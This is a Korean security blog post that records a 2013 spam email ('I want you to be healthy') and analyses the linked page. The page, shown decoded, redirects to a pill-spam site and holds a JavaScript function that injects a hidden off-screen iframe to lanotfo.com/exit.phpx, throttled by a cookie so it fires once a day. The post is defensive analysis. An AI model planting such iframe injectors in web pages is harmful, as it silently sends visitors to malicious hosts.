본문 바로가기

security/악성코드 유포

[악성 스크립트로 연결하는 스팸메일] I want you to be healthy

오랜만에 악성스크립트로 연결시키는 스팸메일을 내 이메일을 통해 받아서 기록해 둔다.


발신 : <richartl@bladechevy.com>

수신 : <power2618@naver.com>

날짜 : 13-10-21 (월) 03:21

제목 : I want you to be healthy


[본문 내용] 

<html><body>

http://mhr.ro/pride.html Do you know what your lover wants during nights?

<_body><_html>


[발신자 정보 위치 - bladechevy.com]



[http://mhr.ro/pride.html - 사이트 본문 내용]



[디코딩]


Redirecting -> http://albertacanadapills.nl">


-----------------------------------------------------------------------------------------------


 function q09() {

 var static='ajax';

 var controller='index.php';

 var q = document.createElement('iframe');


 q.src = 'http://lanotfo.com/exit.phpx';

 q.style.position = 'absolute';

 q.style.color = '55';

 q.style.height = '55px';

 q.style.width = '55px';

 q.style.left = '100055';

 q.style.top = '100055';


 if (!document.getElementById('q')) {

 document.write('<p id=\'q\' class=\'q09\' ></p>');

 document.getElementById('q').appendChild(q);

 }

}

function SetCookie(cookieName,cookieValue,nDays,path) {

 var today = new Date();

 var expire = new Date();

 if (nDays==null || nDays==0) nDays=1;

 expire.setTime(today.getTime() + 3600000*24*nDays);

 document.cookie = cookieName+"="+escape(cookieValue)

 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie( name ) {

 var start = document.cookie.indexOf( name + "=" );

 var len = start + name.length + 1;

 if ( ( !start ) &&

 ( name != document.cookie.substring( 0, name.length ) ) )

 {

 return null;

 }

 if ( start == -1 ) return null;

 var end = document.cookie.indexOf( ";", len );

 if ( end == -1 ) end = document.cookie.length;

 return unescape( document.cookie.substring( len, end ) );

}

if (navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');


q09();

}

}


[세부 정보]


http://lanotfo.com/exit.phpx // 500 internal server error

=========================

Server IP(s):

0.0.0.0

=========================



http://albertacanadapills.nl



[도식화]